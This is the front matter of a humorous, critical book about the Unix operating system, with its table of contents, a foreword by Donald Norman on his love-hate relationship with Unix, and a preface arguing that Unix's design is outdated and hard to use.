18:13:29 [noah]
HT: I can send a package with all the emails tomorrow.
18:13:35 [DanC]
PROPOSED: to respond to XRI docs ala 0062 in the tag archive, plus public version of technical details discussed in tag@w3.org ...
18:13:49 [noah]
HT: I can then reference that and other threads in the formal response.
18:14:17 [DanC]
PROPOSED: to respond to XRI docs ala 0062 in the tag archive, plus public version of technical details discussed in tag@w3.org by HT, unless show-stoppers are raised within 2 business days
18:14:25 [Ed]
+1
18:14:31 [noah]
VQ: OK, and formal response can go out by Friday after we review
18:14:49 [noah]
VQ: who should send?
18:14:51 [DanC]
mechanics: VQ mail it to www-tag and then copy it into the OASIS form.
18:15:09 [noah]
TBL: Anybody on TAG can do as long as they correctly speak for the TAG.
18:15:24 [noah]
HT: I think it would be more polite from VQ
18:15:54 [noah]
DC: The mechanics of getting feedback to them are more complex than you'd like.
18:16:06 [noah]
TBL: Do email first so at least we have web archive copy for reference.
18:16:46 [DanC]
mechanichs: VQ send to xri-comments@lists.oasis.org, cc www-tag; then take a pointer and put it in the OASIS form
18:17:24 [noah]
NRM: Suggest that Henry's note warn that we owe feedback at end of week, and that we need to focus discussion toward that goal.
18:17:36 [noah]
General agreement to that suggestion.
18:17:45 [noah]
DC: Silence is assent.
18:18:14 [DanC]
RESOLVED: to respond to XRI docs ala 0062 in the tag archive, plus public version of technical details discussed in tag@w3.org by HT, unless show-stoppers are raised within 2 business days
18:18:15 [noah]
VQ: Right, if there's no objection, I'll send Friday France time.
18:19:51 [noah]
Note that the HTTPDNS thread (note) mentioned above is at:
18:20:00 [noah]
Topic: Binary XML
18:20:17 [noah]
VQ: I see some progress in email.
18:20:36 [noah]
VQ: Ed, do you feel your action is fulfilled?
18:20:52 [noah]
ED: The working group doesn't exist, where do comments go?
18:21:08 [noah]
DC: Mailing list exists after group is gone. use public-xml-binary@w3.org
18:21:27 [noah]
VQ: Do we expect to do more?
18:21:37 [timbl]
18:21:40 [noah]
DC: Where's the list?
18:21:53 [ndw]
I agreed with Dave's points, it's a good list
18:23:24 [DanC]
18:23:40 [DanC]
DanC has changed the topic to:
18:24:09 [noah]
Discussing Ed's additions to the list at:
18:25:01 [noah]
VQ: Proposal for today is to ask everyone to check this message, and see whether we think this is our reply.
18:27:15 [Vincent]
ack danc
18:27:15 [Zakim]
DanC, you wanted to re-iterate Orchard's concerns about explaining how http/DNS addresses these issues and to
18:27:40 [noah]
NRM: Should we also get ready to signal whether and how we would contribute to the possible chartering of a new WG?
18:27:51 [noah]
TBL: That's the director's decision.
18:28:31 [noah]
NRM: I think it's for the TAG to decide whether they do or don't want to provide input to the director and/or the AC. I'm suggesting it may be constructive to do a round of thinking now about where we stand on that.
18:28:38 [noah]
DC: Do we have a draft response.
18:28:40 [noah]
No.
18:28:46 [noah]
ED: I can try to draft one.
18:29:59 [noah]
DC: I had said we should try to make a decisionon issue 30 before June AC meeting. Because the team may not make that deadline anyway, the need for feedback is less urgent.
18:30:15 [noah]
VQ: Ed's help in refining this is most welcome.
18:30:18 [noah]
ED: Input solicited.
18:30:37 [noah]
NRM: Please extract from email thread as well.
18:30:39 [noah]
ED: Will do.
18:30:45 [noah]
Topic: Closing
18:30:56 [noah]
VQ: Two or three items remain.
18:31:33 [noah]
VQ: Roy, could you look at putMediaType-38. I've looked, just have to write the email. Put on agenda for next week.
18:32:12 [Roy]
I've looked, just have to write the email.
18:32:15 [Zakim]
-norm
18:32:16 [Zakim]
-Vincent
18:32:16 [Zakim]
-noah
18:32:18 [Zakim]
-DanC
18:32:18 [noah]
HT: I sent some email on httpRange-14.
18:32:23 [Ed]
suggest asking Zakim to save agenda world-access
18:32:27 [Zakim]
-??P11
18:32:29 [Zakim]
-TimBL
18:32:33 [noah]
VQ: Please send input for next agenda before next Monday, France time.
18:32:43 [Roy]
rrsagent, pointer?
18:32:43 [RRSAgent]
See
18:32:57 [Roy]
rrsagent, make minutes world readable
18:32:57 [RRSAgent]
I'm logging. I don't understand 'make minutes world readable', Roy. Try /msg RRSAgent help
18:33:15 [Ed]
Zakim save agenda world-access
18:33:30 [Ed]
(makes it public and readable)
18:33:48 [Ed]
private logs work as well :)
18:33:54 [noah]
Zakim, save agenda world-access
18:33:54 [Zakim]
the agenda has not been entered yet, noah
18:34:37 [Ed]
This happened to me last time, the IRC log was fine, but there was an invalid date at the start of the log.
18:34:59 [Ed]
I downloaded the IRC, modified the script to fix dates and then re-ran it.
18:35:02 [Zakim]
-Roy_Fielding
18:35:05 [noah]
zakim, bye
18:35:05 [Zakim]
leaving. As of this point the attendees were TimBL, noah, [INRIA], norm, Vincent, Roy_Fielding, Ht, DanC
18:35:05 [Zakim]
Zakim has left #tagmem
18:35:22 [noah]
rrsagent, draft minutes
18:35:22 [RRSAgent]
I have made the request to generate
noah
18:35:39 [Roy]
RRSAgent, make logs world-access
18:36:00 [ht]
ht has left #tagmem
18:36:29 [noah]
rrsagent, bye
18:36:29 [RRSAgent]
I see 2 open action items:
18:36:29 [RRSAgent]
ACTION: Norm to gather errata list for consideration next week. [1]
18:36:29 [RRSAgent]
recorded in
18:36:29 [RRSAgent]
ACTION: Vincent to prepare by mid-May a draft agenda for the June face to face meeting [2]
18:36:29 [RRSAgent]
recorded in | http://www.w3.org/2005/04/26-tagmem-irc | CC-MAIN-2017-30 | refinedweb | 4,961 | 79.4 |
Inputs fields are used to get the user input in a text field.
import { Input } from '@nextui-org/react';
The default
Input contains an animation effect.
Unusable and un-writtable
Input.
Add a clear button in the
Input box.
Add a label to the
Input with the property
label
With the property
labelPlaceholder the placeholder becomes a label with an great animation.
Input component with a show/hide password functionality, Important: You have to use the
Input.Password
component.
Change the size of the entire
Input including
padding,
font-size and
border with the
size property.
You can change the full style towards a bodered
Input with the
bordered property and
you can customize the color with the
color prop.
You can change the full style towards an undelined
Input like the material effect just adding
the
underlined prop.
You can completely round the corners of any type of
Input with the
rounded prop.
You can change the color of the entire
Input with the property
status.
You can disable the shadow of the entire
Input with the property
shadow={false}.
You can disable the animation of the entire
Input with the property
animated={false}.
You can add a helper text to
Input with the prop
helperText and customise its color with the
helperColor prop.
The first example is using the hook useInput
You can put any content at the begining or at the end of the
Input
You can put any content at the begining or at the end of the
Input with the properties
contentLeft and
contentRight.
Impotant: If you want the
Input component change the icon colors according to the current
status color
you should use
currentColor as the icon/svg color to allows .
Change the type of
Input with the
type property as a native html input, the default value is
text
type NormalColors = | 'default' | 'primary' | 'secondary' | 'success' | 'warning' | 'error';
type NormalSizes = 'xs' | 'sm' | 'md' | 'lg' | 'xl';
type NormalWeights = 'light' | 'normal' | 'bold';
type ContentPosition = 'left' | 'right';
type useInput = (initialValue: string) => { value: string; setValue: Dispatch<SetStateAction<string>>; currentRef: MutableRefObject<string>; reset: () => void; bindings: { value: string; onChange: (event: React.ChangeEvent<HTMLInputElement>) => void; }; }; | https://nextui.org/docs/components/input | CC-MAIN-2022-05 | refinedweb | 354 | 51.18 |
View the updated one: Part 2 - Adding user control to SharePoint 2007 (MOSS/WSS) Web Part and handling events in there - Step by Step with task pane properties.
Requirement: I have a Web User Control where I added one textbox and a button. Now I wanted to add this user control into a SharePoint Web Part. After adding this Web Part to any page, if I click the button, there should be a text “Hello World” in the Text Box.
Steps: wucwp
{
[Guid("ee818646-e872-455c-a857-6e64e513539b")]
public class wucwp : System.Web.UI.WebControls.WebParts.WebPart
{
UserControl userControl;
System.Web.UI.WebControls.TextBox txtField;
System.Web.UI.WebControls.Button showButton;
public wucwp()
{
this.ExportMode = WebPartExportMode.All;
}
protected override void Render(HtmlTextWriter writer)
// TODO: add custom rendering code here.
// writer.Write("Output HTML");
userControl.RenderControl(writer);
protected override void CreateChildControls()
base.CreateChildControls();
userControl = (UserControl) Page.LoadControl(@"/wuc/WebUserControl.ascx");
txtField = (System.Web.UI.WebControls.TextBox) this.userControl.FindControl("TextBox1");
showButton = (System.Web.UI.WebControls.Button) this.userControl.FindControl("Button1");
showButton.Click += new EventHandler(showButton_Click);
Controls.Add(userControl);
void showButton_Click(object sender, EventArgs e)
//throw new Exception("The method or operation is not implemented.");
txtField.Text = "Hello World";
}
}
Now deploy this web part and add it to any page of your site and this should work as expected.
Update Note: One minor modification. It is better to put the .WebUserControl.ascx file under 12-Hive\TEMPLATE\CONTROLTEMPLATES folder, and access it as userControl = (UserControl) Page.LoadControl(@"/_controltemplates/WebUserControl.ascx");
Thanks Inge for your inputs.
Requirement: I have a Web User Control where I added one textbox and a button. Now I wanted to add this
Hi,
I have a Windows User Control(Textbox+Button) which i am adding to a web part. It would be great if you could tell me how to handle the windows user control button click event in the webpart?
First, is there a reason why you did not copy the temlate to the _controltemplates folder? It would then be accessible from any Sharepoint site.
Second, did you skip not having a seperate codebehind file because of CAS issues? This can be fixed by setting setting Full trust and copying the codebehind assembly to the bin catalog.
this help a lot for me, this is very good approach and code was very useful simple and error free
Regards,
Fareed Nizami
Software Engineer
fareed.nizami@softechww.com
Has anybody knows how to called UserControl Property Attributes in Webparts ? Because I want to set the customise property attributes for the usercontrol while loading usercontrol in webpartts.
I have a custom property defined in User control.
I want to set the user control property value from within Webpart, which is loading the user control.
When I tried that, I am not getting the property shown in the webpart while accessing the user control.
Is there a way to achieve this.
Regards.
Do u have idea on how to load the Sharepoint user control like ( ToolBar.ascx ) in custom webpart
Thanks
I tried this but I got my user control rendering in the upper left quadrant of the Sharepoint page, not in the web part. I am overriding CreateChildControls and RenderContents as mentioned above. Do I need to use code similar to this?:
Control uc = this.LoadControl(@"webparts\CompanyNews.ascx");
uc.ID = "wp2";
GenericWebPart wp2 = WebPartManager1.CreateWebPart(uc);
WebPartManager1.AddWebPart(wp2, WebPartZone1, 1);
Another question... if I use GenericWebPart and WebPartManager.CreateWebPart (and AddWebPart), would Controls.Add(userControl) even work anymore (as far as wiring up the user controls events to the Page)?
Would I then need to grab a reference to every control within my user control and add an event in my web part if I wanted to respond to a button click within my user control (assuming the button click event in my user control gathers all the inputs from all the controls within the user control)?
Sorry for being wordy, but I'm frazzled beyond belief right now and am in dire need of quick answers to all the questions I laid out in my post. I would be glad to return the favor to anyone who helped me out.
Thank you.
this.ExportMode = WebPartExportMode.All; error ?
I follow the code above when I import the .dwp in webpartzone I got this error
Unable to add selected web part(s). The
Namespace.classname class does not derive from the Microsoft.SharePoint.WebPartPages.WebPart class and therefore cannot be imported or used in a WebPartZone control. If you inherit Microsoft.SharePoint.WebPartPages.WebPart instead of webcontrol it works but events are not fired.
hi
it's really good article.....
thanks..
I have a question..
What if I have a event declared in the User Control, and raise the event.
How can I subscribe for that event when you are dynamically loading the control.
Thanks in advance.
I am brand new to ASP, SharePoint and only moderately acquainted with C# but not in the ASP or SharePoint arena at all. This may be why I cannot get this example to work.
I have copied the steps exactly as they are laid out above. I changed the LoadControl to point to "/_controltemplates/WebUserContol.ascx" as suggested. That file is located at C:\Program Files\Common Files\Microsoft Shared\web server extensions\12\TEMPLATE\CONTROLTEMPLATES on the server.
Everything is being tested and debugged on the server.
When I deploy the web part from VS and then go to the Site Settings in SharePoint and click on Web Parts in the Gallery section I see my new web part is added. If I click on it to see a preview of it I always get an error. That error changes from one version to another. Most of the time it is "Unknown Error" but I have seen "File not found".
Any suggestions?
Thanks,
Robert
hi,
i m using this code as it is, but the problem is that i add this user control to web part and click the nothing happened(in this case hello world not appread in text box)
can anyone tell why my events are not firing.
this event hanlding problem occuring in my all user controls.
kindly help me urgently
thanks in advance
could you please let me know how a user control with a Databound dropdown list could be displayed?
I mean the dropdown list gets data from a database. Do I need to create an instance of the datasource again in the class library file?
Could you please help
Aditi | http://blogs.msdn.com/b/pranab/archive/2007/11/30/adding-user-control-to-sharepoint-2007-moss-wss-web-part-and-handling-events-in-there.aspx | CC-MAIN-2015-32 | refinedweb | 1,085 | 58.28 |
Libraries for GNOME, a GNU desktop environment
WWW:
NOTE: FreshPorts displays only required dependencies information. Optional dependencies are not covered.
No installation instructions: this port has been deleted.
The package name of this deleted port was: gnomelibs
gnomelibs
No options to configure
Number of commits found: 75
x11/gnomelibs -> x11/gnome-lib japanese/gnomelibs, chase the rename.
PR: ports/97985
Repocopy by: marcus
portlint:
-Use DOCSDIR in plist.
Add USE_GETTEXT to appease portlint.
Remove USE_REINPLACE from categories starting with X change permissions and group ownership of the share/gnome/games
directory. Leave that up to gnomeh.
Protect target with .if target(...) ... .endif for targets that are
redefined by a slave port.
Fix build on -CURRENT.
GNOME has just changed the layout of their FTP site. This resulted in
making all the distfiles unfetachable. Update all GNOME ports that fetch
from MASTER_SITE_GNOME to fetch from the correct location.
Fix a problem with word selection in gnome-terminal. Bump PORTREVISION.
Update to 1.4.2.
Fix patch, so that it actually applies.
Fix a problem with GNOME and XIM compatibility. Bump PORTREVISION.
PR: 40125
Submitted by: sf
Pointy hat to: marcus 1.4.1.7.
- Move misc documentation into share/doc where it belongs;
- use USE_LIBTOOL while I here;
- make gnome-hint from gnomecore actually working;
- bump PORTREVISIONs.
Hack for better hier(7) conformance - install libart documentation into
${PREFIX}/share/doc.
Clean up the plists some.
* "Share" directories such as share/gnome, share/gnome/pixmaps, and etc/sound
between both GNOME 1.4 and GNOME 2.0.
* Remove some @dirrm's from gtm that were already in dependency ports.
Update to 1.4.1.6.
Fix installation is gtk-doc is also installed.
Note, since it seems like a number of ports are broken when gtk-doc is
also installed, I wonder if adding --disable-gtk-doc to all their
CONFIGURE_ARGS isn't a bad idea.
Reviewed by: sobomax
Approved by: sobomax
Update to 1.4.1.5.
Prevent libc from being explicitly linked into shared libs. Bump PORTREVISION.
Update to 1.4.1.4.
Update to 1.4.1.3.
Fix a null pointer dereferencing bug in gtk-xmhtml library observed when
browsing evolution documentation. Bump PORTREVISION.
Some of the GNOME components now install their include files into
${PREFIX}/include/gnome-1.0 instead of plain ${PREFIX}/include, so make
gnome-config return appropriate cpp(1) flags necessary to find those headers.
Bump PORTREVISION accordingly.
Allow japanese/gnomelibs to add LIB_DEPENDS:
Update to 1.4.1.2.
Update to 1.4.1.1.
Unbroke on alpha.
Add textproc/libxml as an explicit dependency, as well as the implicit
dependency through textproc/scrollkeeper. Something strange is going on here,
and this is a reasonable temporary fix.
Remove empty patchfile that got left around sometime.
SWitch maintainership of core GNOME ports to a small group of committers
(gnome@FreeBSD.org), since this is now definitely too big for just one person.
Missed patch from the update causing an mtree failure.
Update to GNOME 1.4 -- massive changes all around, for the sake of CVS repo
bloat, I'll only list the updates.
-pthread --> ${PTHREAD_LIBS} -D_THREAD_SAFE --> ${PTHREAD_CFLAGS}
Style fixes for ports/x11.
It's another day. Update to 1.2.11
Another day. Another GNOME release. 1.2.10 here
Allow CATEGORIES to be overriden by the respective japanese/* ports (and
others, should they ever be born)
*sigh* missed a relatvely important patch, at least from a packaging PoV Bump
PORTREVISION accordingly.
Update to 1.2.9 -- bring in a few pieces of documentation here which slightly
change a few other ports.
Conditionally set MAINTAINER, so that the japanese slave ports DTRT
Let the Ade deal with this.
Bump PORTREVISION as a result of my previous commit (sound fix).
Make sound working again.
Update to 1.2.8
Update to 1.2.7
Update to 1.2.6
Update to 1.2.5
Convert category x11 to new layout.
Implement WANT_IMLIB and USE_IMLIB.
Remove scsh from "known shells".. it's not an interactive shell.
Allow gnomelibs to DTRT in the case where ${LOCALBASE} is not /usr/local
Add fix for GNOME forcibly trying to set the locale to en_US under certain
circumstances.
Re-sobomize to use pre-patch instead of post-extract
Extensive patchfile cleanups using sobomax's wonderful post-extract typos
Update to 1.2.4
Update to 1.2.3
Update to 1.2
5 vulnerabilities affecting 12 ports have been reported in the past 14 days
* - modified, not new
All vulnerabilities | http://www.freshports.org/x11/gnomelibs/ | CC-MAIN-2014-41 | refinedweb | 750 | 62.04 |
bt_ldev_set_filters()
This function allows you to enable or disable BT_EVT event triggering from bt_device_cb.
Synopsis:
#include <btapi/btdevice.h>
int bt_ldev_set_filters(int event, bool enable)
Since:
BlackBerry 10.3.0
Arguments:
- event
The BT_EVT to enable or disable. Use BT_EVT_ALL_EVENT to represent all events.
- enable
If set to true, the event triggers bt_device_cb. If set to false, the event does not trigger bt_device_cb.
Library:libbtapi (For the qcc command, use the -l btapi option to link against this library)
Description:
Use BT_EVT_ALL_EVENT to enable or disable all events. The default value is no event filtering.
Returns:
- ENOMEM: Sufficient memory is not available to perform the request.
- ESRVRFAULT: An internal error has occurred.
Last modified: 2014-06-24
Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus | https://developer.blackberry.com/native/reference/core/com.qnx.doc.bluetooth.lib_ref/topic/bt_ldev_set_filters.html | CC-MAIN-2020-10 | refinedweb | 133 | 62.44 |
- Patch libmemcache
- Compile and install libmemcache
- sudo apt-get install python-dev
- sudo python setup.py install
- Download the actual memcached, compile and install
- Use it (StringClient for strings, Client uses pickle for other types):
It's been a while since I used patch, so I thought I'd record the command I used. This was a multifile patch, and it applies the patches to all the right files. How cool is that! The -p1 prunes off one slash of the path since my directory was different to the guys who made the patch.
patch -b -p1 -i libmemcache-1.4.0.rc2.patch
import cmemcache
a=cmemcache.StringClient(["127.0.0.1:11211"])
a.set('key', 'value')
a.get('key')
1 comment:
Which version of cmemcached did you install? | http://ilostmynotes.blogspot.com/2008/04/python-memcached.html | CC-MAIN-2017-34 | refinedweb | 130 | 76.11 |
This action might not be possible to undo. Are you sure you want to continue?
The UNIX-
HATERS Handbook
“Two of the most famous products of Berkeley are LSD and Unix. I don’t think that is a coincidence.”
®
Edited by Simson Garfinkel, Daniel Weise, and Steven Strassmann
PROGRAMMERS
IDG BOOKS
Illustrations by John Klossner
iv
IDG Books Worldwide, Inc. An International Data Group Company
San Mateo, California • Indianapolis, Indiana • Boston, Massachusetts
The UNIX-HATERS Handbook
Published by IDG Books Worldwide, Inc. An International Data Group Company 155 Bovet Road, Suite 310 San Mateo, CA 94402 Copyright 1994 by IDG Books Worldwide. All rights reserved.
The knowledge base of our editorial staff comes from years of experience in publishing. is a subsidiary of International Data Group. IDG Books has become the first choice for millions of readers around the world who want to learn how to better manage their businesses. became the first U. we care about books. the worlds largest publisher of business and computer-related information and the leading global provider of information services on information technology. Our books are written by experts who understand and care about our readers. In record time. Launched in 1990. John Kilcullen President and CEO IDG Books Worldwide.700 people worldwide. interior design. Inc. we can spend more time ensuring superior content and spend less time on the technicalities of making books.. IDG was founded over 25 years ago and now employs more than 5. edit. and we have been delivering quality for over 25 years. and illustrations. use of icons. Forty million people read one or more IDG publications each month. We are proud to have received 3 awards from the Computer Press Association in recognition of editorial excellence. IDG Books. and our best-selling “… For Dummies” series has over 7 million copies in print with translations in more than 20 languages. IDG publishes over 195 publications in 62 countries.viii About IDG Books Worldwide Welcome to the world of IDG Books Worldwide. You’ll find no better book on a subject than an IDG book. we value quality.S. We devote special attention to details such as audience. Inc. so we attract the best people. And because we write. through a recent joint venture with IDG’s Hi-Tech Beijing. . publisher to publish a computer book in The People’s Republic of China. IDG Books Worldwide. At IDG. and produce our books electronically. IDG Books is today the fastest growing publisher of computer and business books in the United States. Our mission is simple: Every IDG book is designed to bring extra value and skill-building instruction to the reader. education. You can count on our commitment to deliver high quality books at competitive prices on topics you want to read about. In short. and journalism—experience which we use to produce books for the 90s.
ix .
x .
.........................................................................Table of Contents Foreword .................. xxxv By Dennis Ritchie Part 1: User Friendly?......................................................... Norman Preface ................................................................................................................................................................................................................... Drugs.......................................... xxix Typographical Conventions ................................. 4 Sex............................ xxi The UNIX-HATERS History .................. xix Things Are Going to Get a Lot Worse Before Things Get Worse Who We Are...................................................................................................... xv By Donald A................................ 14 ix ........................................ 9 Standardizing Unconformity....................... xxxii The UNIX-HATERS Disclaimer ............... 1 1 Unix ............ and Unix ..xxxiii Anti-Foreword ..........................................xxiii Contributors and Acknowledgments............................................................................................. 3 The World’s First Computer Virus History of the Plague............................ 10 Unix Myths ..........................................
.........61 Don’t Talk to Me..........105 Seven Stages of Snoozenet............................74 Apple Computer’s Mail Disaster of 1991........................106 ...........................................................................54 Unix Without Words: A Course Proposal .............17 Like Russian Roulette with Six Bullets Loaded Cryptic Command Names ...flamage ..........edu> ..........................62 Subject: Returned Mail: User Unknown .................................................................18 Accidents Will Happen................................................................96 Alt...........................x 2 Welcome. NOT! .......93 Newsgroups ................ Post ......100 rn..........................................................101 When in Doubt................................................................................................................................................................................................100 This Information Highway Needs Information ...massive................................................................................................................................. Not Users...................31 Error Messages and Error Checking...85 5 Snoozenet ............................................................................43 What Documentation? On-line Documentation ........................................67 From: <MAILER-DAEMON@berkeley.......................................26 Online Documentation .. New User! ...37 3 Documentation? ..........................................................................................19 Consistently Inconsistent............ trn: You Get What You Pay for ...................................................................56 4 Mail.........31 The Unix Attitude................................93 I Post.................................................44 This Is Internal Documentation? ............. I’m Not a Typewriter! Sendmail: The Vietnam of Berkeley Unix ..............................51 For Programmers....................................... Therefore I Am Netnews and Usenet: Anarchy Through Growth .........................................................
................................................176 “It Can’t Be a Bug....................................................................................................................................................................................... Restart It! ................ 114 7 The X-Windows Disaster .......................................................145 8 csh....................................................................175 Programming in Plato’s Cave......................................................................173 Hold Still................................................................................141 X: On the Road to Nowhere ............................................... and find ......77MHz IBM PC X: The First Fully Modular Software Disaster.....................................................147 Power Tools for Power Fools The Shell Game ...124 X Myths..............142 Part 2: Programmer’s System? ..................148 Shell Programming.........................................................................................................123 How to Make a 50-MIPS Workstation Run Like a 4. pipes.......................................xi 6 Terminal Insanity .....155 Pipes ................... 111 Curses! Foiled Again! Original Sin ............................................................................127 X Graphics: Square Peg in a Round Hole ...........198 ........................... 111 The Magic of Curses ...................186 If You Can’t Fix It........ My Makefile Depends on It!”............166 9 Programming ................................................. This Won’t Hurt a Bit The Wonderful Unix Programming Environment ..........161 Find.........
...........................208 Abstract What? .......................................241 12 Security ..............................203 The COBOL of the 90s The Assembly Language of Object-Oriented Programming ...................................................211 C++ Is to C as Lung Cancer Is to Lung ...........................................................................257 13 The File System ....................219 11 System Administration .......................................................................................................244 The Worms Crawl In ...............................................................................221 Unix’s Hidden Cost Keeping Unix Running and Tuned .223 Disk Partitions and Backups.........239 Where Did I Go Wrong? ................................................................................ Sir.....................262 UFS: The Root of All Evil..................................................xii 10 C++ ..................... I Didn’t Realize You Were Root The Oxymoronic World of Unix Security .............................................................................215 Part 3: Sysadmin’s Nightmare .................... Go Ahead.....................................................................243 Oh.235 Maintaining Mail Services ...................................204 Syntax Syrup of Ipecac.....243 Holes in the Armor ............................... I’m Sorry.................................214 The Evolution of a Programmer ..................................................................................227 Configuration Files...............................................265 .........................261 Sure It Corrupts Your Files.............. But Look How Fast It Is! What’s a File System? ..................................................................................................
......................................................................319 ........................................................................................................... Gabriel D Bibliography ................307 FOR IMMEDIATE RELEASE C The Rise of Worse Is Better ........317 Just When You Thought You Were Out of the Woods… Index ...... 311 By Richard P.....................287 Not File System Specific? (Not Quite)................305 Enlightenment Through Unix B Creators Admit C..............................................................292 Part 4: Et Cetera ......................................303 A Epilogue....................................................................................xiii 14 NFS ..........................................284 No File Security...... Unix Were Hoax ..........................................................................283 Nightmare File System Not Fully Serviceable..............................................................
.
2nd revised edition. Perspectives on the Computer Revolution. A. Norman. Well. 139-150. It’s a perverse book.Foreword By Donald A. Reprinted in Pylyshyn. But then again. the hacker’s pornography. The Trouble with Unix: The User Interface is Horrid. NJ. But it isn’t even referenced in this one. Norman The UNIX-HATERS Handbook? Why? Of what earthly good could it be? Who is the audience? What a perverted idea. pp. I’ll fix that: Norman. When this particular rock-throwing rabble invited me to join them. Datamation. 27 (12) 1981. J. I give up: I like it. Printed with permission. except that all the other commercial offerings are even worse. 1989. What is this horrible fascination with Unix? The operating system of the 1960s. still gaining in popularity in the 1990s. Two hours. Hillsdale. L. reading the manuscript. W. November. Ablex. One and one-half hours. Who would have thought it: Unix. but it has an equally perverse appeal. The only operating ––––––––––––––––––––––––––– Copyright 1994 by Donald A. A horrible system. I thought back to my own classic paper on the subject. I have been sitting here in my living room—still wearing my coat—for over an hour now. But appealing. & Bannon. What a strange book. so classic it even got reprinted in a book of readings. OK. D. Z. eds.. ..
but aside from that it was still a real computer. Unix was a programmer’s delight.000 words of memory. A comfortable. with upper. You know the real trouble with Unix? The real trouble is that it became so popular. nobody cared about such things. Fast—ran an instruction in roughly a microsecond. No. graphical operating system? Oh yeah. Try logging in with all capitals. the main input/output device was a 10-character/second. a graphical user interface for Unix). The user interface was indeed horrible. Simple. That was a fantastic advance over my PDP-4 that had 8. I used to have one of those. An elegant instruction set (real programmers. It wasn’t meant to be popular. Make it graphical (now that’s an oxymoron. those were the real days of computing.000. I survived. For many of us. It was meant for a few folks working away in their labs. The PDP-11 had 16. Look at Unix today: the remnants are still there. Unix survives only because everyone else has done so badly. I even got dragged to Bell Labs to stand up in front of an overfilled auditorium to defend myself. What kind of challenge is there when you have that much RAM? Unix was designed before the days of CRT displays on the console. As far as I know. I hasten to add. Unix survived. program in assembly code).and lowercase. Equipped with a paper tape reader. Worse. There were many valuable things to be learned from Unix: how come nobody learned them and then did better? Started from scratch and produced a really superior. as you did with the PDP-1 and PDP-4. Lights to show you what was in the registers. broadcast over UUCP-Net. I was the very first person to complain about it in writing (that infamous Unix article): my article got swiped from my computer. you see. and I got over 30 single-spaced pages of taunts and jibes in reply. using Digital Equipment Corporation’s old PDP-11 computer. elegant underpinnings. Unix was designed for the computing environment of then. You can’t even single-step today’s machines. no register switches. Toggle switches on the front panel. You didn’t have to toggle in the boot program anymore. And those were the days of Unix. They always run at full speed. Not like those toys we have today that have no flashing lights. The Macintosh on which I type this has 64MB: Unix was not designed for the Mac. not the machines of today. both).xvi Foreword system that is so bad that people spend literally millions of dollars trying to improve it. all uppercase teletype (advanced users had 30character/second teletypes. Many Unix systems will still switch to an all-caps mode. but in those days. Weird. . modern. room-sized machine.
no more piping. but in the end. And don’t give me that ‘you deny it—y’see. exotic command strings. No more grep. elegant life: “Your application has unexpectedly quit due to error number –1. but “The only truly irksome part is the ‘c’mon. but when I tried to say so (in a draft of this foreword). I got shot down: “Sure. Emeritus University of California. Inc. Norman Apple Fellow Apple Computer. filters.” I remain suspicious: would anyone have spent this much time and effort writing about how much they hated Unix if they didn’t secretly love it? I’ll leave that to the readers to judge. The continuing popularity of Unix remains a great puzzle. the necessity) to write long. nothing will.” they told me. And I truly do miss the ability (actually.xvii and did the other thing that made Unix so very successful: give it away to all the universities of the world. inconsistent flag settings. As for me? I switched to the Mac. that proves it’ stuff. Just a simple. no more SED scripts. you really love it. Much though I try to escape it. pipes. we love your foreword. San Diego . and redirections. I have to admit to a deep love-hate relationship with Unix. I’m tempted to say that the authors of this book share a similar love-hate relationship. with mysterious. it really doesn’t matter: If this book doesn’t kill Unix. OK?” Donald A. it keeps following me. We really do hate it. Really.’ No. even though we all know that it is not the best technology that necessarily wins the battle. And while I’m at it: Professor of Cognitive Science.
.
your body is covered with lice and flies. An exaggeration? You won’t think so after reading this book. with all the recent deal making and unmaking. it is hard to track the trademark owner du jour. unforgiving. Unix was a trademark of AT&T. But. It’s the “Un-Operating System”: unreliable. and destroys the common sense of many who seriously use it.” — Ken Pier.Preface Things Are Going to Get a Lot Worse Before Things Get Worse “I liken starting one’s computing career with Unix. Then it was a trademark of Unix Systems Laboratories. unhelpful. this is simply the natural condition and they live within it. Modern Unix impedes progress in computer science. Novell was thinking of giving the trademark to X/Open. say as an undergraduate. . It is intolerably hot. unintuitive. and underpowered. By the time they find out differently. Little is more frustrating than trying to force Unix to do something useful and nontrivial. 1 Once upon a time. you are malnourished and you suffer from numerous curable diseases. Then it was a trademark of Novell. to being born in East Africa. but. They already think that the writing of shell scripts is a natural act. wastes billions of dollars. Xerox PARC Modern Unix1 is a catastrophe. it is too late. as far as young East Africans can tell. Last we heard.
The Unix networking model is a cacophonous Babel of Unreliability that quadrupled the size of Unix’s famed compact kernel. Indeed. It was developed for a machine with little memory. intelligent peripherals. Ironically. as Unix is pushed to be more and more. Despite increasingly fast. . tiny disks. And like those technologies. rightfully belongs to history.” • “Everything is a stream of bytes. Unix cannot be fixed from the inside. high-performance asynchronous I/ O is a pipe dream. host disease with its concomitant proliferation of incapacitating scar tissue. Unix. Unix security remains an elusive goal at best. and no power. and carbon paper. no graphics. Using Unix remains an unpleasant experience for beginners and experts alike. In those days it was mandatory to adopt an attitude that said: • “Being small and simple is more important than being complete and correct. Even though manufacturers spend millions developing “easy-to-use” graphical user interfaces. too. the very attributes and design goals that made Unix a success when computers were much smaller. now impede its utility and usability. The passing years only magnify the flaws.xx Preface Deficient by Design The original Unix solved a problem and solved it well.S. Despite a plethora of fine books on the subject. Its new system administration tools take more time to use than they save. Each graft of a new subsystem onto the underlying core has resulted in either rejection or graft vs.” These attitudes are no longer appropriate for an operating system that hosts complex and important applications.” • “You only have to solve 90% of the problem. Postal Service look positively stellar. few versions of Unix allow you to do anything but trivial system administration without having to resort to the 1970s-style teletype interface. Its window system inherited the cryptic unfriendliness of its character-based interface. They can even be deadly when Unix is used by untrained operators for safety-critical tasks. the mercury treatment for syphilis. no networking. and were expected to do far less. It must be discarded. as did the Roman numeral system. Its mailer makes the U. it instead becomes less and less. while at the same time realized new ways to bring fast computers to a crawl.
It’s tempting to write us off as envious malcontents. our sense of the possible pure. or ever can be. Apollo Domain. We have all experienced much more advanced. ITS (the Incompatible Timesharing System). romantic keepers of memories of systems put to pasture by the commercial success of Unix. usable. Some of these systems have increasingly forgotten names. None of us were born in the computing analog of Ken Pier’s East Africa. We seek progress. Many of us are highly proficient programmers who have served our time trying to practice our craft upon Unix systems. and the Dorado. such as TOPS-20.Who We Are xxi Who We Are We are academics. Multics. but it would be an error to do so: our judgments are keen. Some of us even use Macs and Windows boxes. hackers. and our outrage authentic. . and elegant systems than Unix ever was. Cedar/Mesa. and professionals. not the reestablishment of ancient relics. the Lisp Machine.
